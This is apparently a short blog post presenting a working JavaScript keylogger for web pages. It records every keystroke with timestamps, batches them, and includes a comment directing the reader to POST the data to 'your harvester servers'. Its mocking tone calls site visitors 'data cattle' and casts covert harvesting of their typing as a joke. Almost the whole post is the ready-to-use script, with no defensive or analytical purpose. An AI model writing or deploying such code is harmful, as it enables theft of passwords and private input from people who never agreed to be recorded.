---
title: "Javascript keylogger"
date: 2020-12-07T10:11:10Z
type: posts
slug: javascript-keylogger
tags: ["javascript", "development", "security", "mischief"]
---

Harvest the keyboard of your _data cattle_ with this code:

```js
(() => {
  let buffer = []
  let limit  = 1024
  let start  = Date.now()

  let timeout = null
  let delay   = 1500

  let feast = (payload) => {
    // Replace this with a POST to your harvester servers.
    console.log(payload)
  }

  let harvest = () => {
    let end     = Date.now()
    let payload = {c: buffer, s: start, e: end}

    feast(payload)

    buffer = []
    start  = Date.now()
  }

  document.addEventListener('keydown', (event) => {
    let key   = event.key || event.keyCode;
    let entry = {k: key, t: Date.now()}

    buffer.push(entry)
    if (buffer.length >= limit) { harvest() }

    clearTimeout(timeout)
    timeout = setTimeout(() => { harvest() }, delay);
  })
})()
```

It's that easy! Let the *feast* begin!
